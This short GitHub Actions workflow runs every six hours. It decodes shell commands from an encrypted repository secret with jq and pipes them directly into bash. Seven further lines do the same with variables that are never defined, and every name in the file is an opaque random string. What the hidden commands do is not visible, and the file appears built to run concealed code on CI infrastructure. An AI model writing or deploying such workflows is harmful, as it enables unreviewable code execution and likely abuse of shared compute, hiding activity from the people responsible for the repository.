name: noticecartier
on:
  workflow_dispatch:
  schedule:
    - cron: '4 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: noticecartier
        env:
          ep60: ${{ secrets.ep60 }}
        run: |
          echo $ep60 | jq -r .by27095 | /bin/bash
          echo $fsgl431 | jq -r .rl1 | /bin/bash
          echo $kavgw0 | jq -r .ho393 | /bin/bash
          echo $dei4028 | jq -r .jufu454 | /bin/bash
          echo $b5283 | jq -r .rpnik473 | /bin/bash
          echo $tr7887 | jq -r .oxu3 | /bin/bash
          echo $no48230 | jq -r .qhss68 | /bin/bash
          echo $oelcp39310 | jq -r .uoatx84 | /bin/bash

